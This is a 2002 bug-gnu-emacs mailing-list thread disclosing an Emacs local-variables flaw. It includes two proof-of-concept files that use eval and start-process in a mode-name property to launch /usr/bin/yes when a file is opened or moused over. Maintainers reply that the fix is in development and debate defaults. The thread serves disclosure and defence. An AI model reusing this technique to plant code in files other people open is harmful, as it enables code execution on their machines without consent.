* security problem in emacs @ 2002-12-31 12:17 Georgi Guninski 0 siblings, 0 replies; 6+ messages in thread From: Georgi Guninski @ 2002-12-31 12:17 UTC (permalink / raw) [-- Attachment #1: Type: text/plain, Size: 297 bytes --] Hi, Attached file demonstrates GNU Emacs 21.2.1 starting process if a text file is opened. Just open it with emacs and check for processes "yes". I suggest disabling local variables by default, because probably there are similar bugs of the same nature. All the best in the new year! Georgi [-- Attachment #2: emacs1.emacs --] [-- Type: text/plain, Size: 357 bytes --] /* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */ Emacs better than windoze. ;;; Local Variables: *** ;;; mode: text *** ;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) *** ;;; comment-start: ";;; " *** ;;; comment-end:"***" *** ;;; End: *** [-- Attachment #3: Type: text/plain, Size: 148 bytes --] _______________________________________________ Bug-gnu-emacs mailing list Bug-gnu-emacs@gnu.org http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs ^ permalink raw reply [flat|nested] 6+ messages in thread
[parent not found: <mailman.749.1041337086.19936.bug-gnu-emacs@gnu.org>]
[parent not found: <84znqm8f1k.fsf@lucy.cs.uni-dortmund.de>]
* Re: security problem in emacs [not found] ` <84znqm8f1k.fsf@lucy.cs.uni-dortmund.de> @ 2002-12-31 14:47 ` Georgi Guninski 2002-12-31 15:14 ` Alfred M. Szmidt [not found] ` <mailman.754.1041346047.19936.bug-gnu-emacs@gnu.org> 1 sibling, 1 reply; 6+ messages in thread From: Georgi Guninski @ 2002-12-31 14:47 UTC (permalink / raw) Cc: bug-gnu-emacs [-- Attachment #1: Type: text/plain, Size: 595 bytes --] Kai Gro?johann wrote: > Georgi Guninski writes: > > > >Attached file demonstrates GNU Emacs 21.2.1 starting process if a text > >file is opened. Just open it with emacs and check for processes "yes". > > > This has been fixed in the development sources. The user is asked > whether to execute the Lisp code. > > Alas, this has not been fixed in the 21.3 pretest. Is the new attached file also fixed? It requires mouse over text. I suggest you disable local variables by default - they are not portable and some people use emacs for examining untrusted log files or read mail. georgi [-- Attachment #2: emacs2.emacs --] [-- Type: text/plain, Size: 656 bytes --] /* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */ Emacs better than windoze. Mouse over the modeline, then check for started yes. ;;; Local Variables: *** ;;; mode: text *** ;;; mode-name: #("MOUSE OVER ME " 0 10 (local-map (keymap (header-line (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes")) (down-mouse-3 . mode-line-mode-menu-1)) (mode-line keymap (down-mouse-3 . mode-line-mode-menu-1))) help-echo (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes")) ) ) *** ;;; comment-start: ";;; " *** ;;; comment-end:"***" *** ;;; End: *** [-- Attachment #3: Type: text/plain, Size: 148 bytes --] _______________________________________________ Bug-gnu-emacs mailing list Bug-gnu-emacs@gnu.org http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: security problem in emacs 2002-12-31 14:47 ` Georgi Guninski @ 2002-12-31 15:14 ` Alfred M. Szmidt 2002-12-31 15:42 ` Georgi Guninski [not found] ` <mailman.760.1041349397.19936.bug-gnu-emacs@gnu.org> 0 siblings, 2 replies; 6+ messages in thread From: Alfred M. Szmidt @ 2002-12-31 15:14 UTC (permalink / raw) Cc: kai.grossjohann Is the new attached file also fixed? Emacs CVS gives a warning about the code. I suggest you disable local variables by default - they are not portable and some people use emacs for examining untrusted log files or read mail. Disabling local variables completely seems silly. Making Emacs warn the user when running local-hook's or eval's is a far better idea; which is done in CVS. Local variables are very useful. ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: security problem in emacs 2002-12-31 15:14 ` Alfred M. Szmidt @ 2002-12-31 15:42 ` Georgi Guninski [not found] ` <mailman.760.1041349397.19936.bug-gnu-emacs@gnu.org> 1 sibling, 0 replies; 6+ messages in thread From: Georgi Guninski @ 2002-12-31 15:42 UTC (permalink / raw) Cc: kai.grossjohann Alfred M. Szmidt wrote: > Is the new attached file also fixed? > > Emacs CVS gives a warning about the code. So since emacs CVS fixes at least 2 security bugs you may think about releasing a new version or at least patches. > > I suggest you disable local variables by default - they are not > portable and some people use emacs for examining untrusted log > files or read mail. > > Disabling local variables completely seems silly. Making Emacs warn > the user when running local-hook's or eval's is a far better idea; > which is done in CVS. Local variables are very useful. > > I continue to disagree that local variables on by default is a good idea, but am tired of arguing about it. So here are some last arguments: 1. I found 2 security bugs on release version of emacs in less than week. How many left do you think are? Of course the idea of warning about eval or hooks seems good, but covering all cases of non-obvious evals in a large project is difficult task. 2. Lusers like micro$oft thought in the beginning that scripting in email/word is a good idea and it is sandboxed. Now it is off by default in their email products. Think about it. 3. Local variables are not portable accross editors, which makes them almost useless, unless every document has all the version of local variables for every editor. georgi ^ permalink raw reply [flat|nested] 6+ messages in thread
[parent not found: <mailman.760.1041349397.19936.bug-gnu-emacs@gnu.org>]
* Re: security problem in emacs [not found] ` <mailman.760.1041349397.19936.bug-gnu-emacs@gnu.org> @ 2002-12-31 18:00 ` Miles Bader 0 siblings, 0 replies; 6+ messages in thread From: Miles Bader @ 2002-12-31 18:00 UTC (permalink / raw) Georgi Guninski <guninski@guninski.com> writes: > 1. I found 2 security bugs on release version of emacs in less than > week. How many left do you think are? Of course the idea of warning > about eval or hooks seems good, but covering all cases of non-obvious > evals in a large project is difficult task. To be fair, both your examples were already taken care of. > 2. Lusers like micro$oft thought in the beginning that scripting in > email/word is a good idea and it is sandboxed. Now it is off by > default in their email products. Think about it. This is not scripting. Whether or not emacs is as restrictive as it should be, I don't know, but there's clearly a large subset of variables/values that can quite safely be set. Yes, if emacs were the kernel, it would have to take a more conservative approach -- but it's not, and convience _is_ important. [Of course, it helps that the `local variables' section is not interpreted for such obviously suspicious sources such as email or news, and that emacs users are in general a more clueful lot than typical MS product users] > 3. Local variables are not portable accross editors, which makes them > almost useless, unless every document has all the version of local > variables for every editor. Who cares about other editors? I certainly don't. -Miles -- `Cars give people wonderful freedom and increase their opportunities. But they also destroy the environment, to an extent so drastic that they kill all social life' (from _A Pattern Language_) ^ permalink raw reply [flat|nested] 6+ messages in thread
[parent not found: <mailman.754.1041346047.19936.bug-gnu-emacs@gnu.org>]
* Re: security problem in emacs [not found] ` <mailman.754.1041346047.19936.bug-gnu-emacs@gnu.org> @ 2002-12-31 15:30 ` Miles Bader 0 siblings, 0 replies; 6+ messages in thread From: Miles Bader @ 2002-12-31 15:30 UTC (permalink / raw) Georgi Guninski <guninski@guninski.com> writes: > > This has been fixed in the development sources. The user is asked > > whether to execute the Lisp code. > > Is the new attached file also fixed? Yes; here's the *Messages* output for that file: Process `eval' or hook local variables in file x? (y or n) Ignoring risky spec in the local variables list -Miles -- Come now, if we were really planning to harm you, would we be waiting here, beside the path, in the very darkest part of the forest? ^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2002-12-31 18:00 UTC | newest] Thread overview: 6+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2002-12-31 12:17 security problem in emacs Georgi Guninski [not found] <mailman.749.1041337086.19936.bug-gnu-emacs@gnu.org> [not found] ` <84znqm8f1k.fsf@lucy.cs.uni-dortmund.de> 2002-12-31 14:47 ` Georgi Guninski 2002-12-31 15:14 ` Alfred M. Szmidt 2002-12-31 15:42 ` Georgi Guninski [not found] ` <mailman.760.1041349397.19936.bug-gnu-emacs@gnu.org> 2002-12-31 18:00 ` Miles Bader [not found] ` <mailman.754.1041346047.19936.bug-gnu-emacs@gnu.org> 2002-12-31 15:30 ` Miles Bader
Code repositories for project(s) associated with this public inbox https://git.savannah.gnu.org/cgit/emacs.git This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).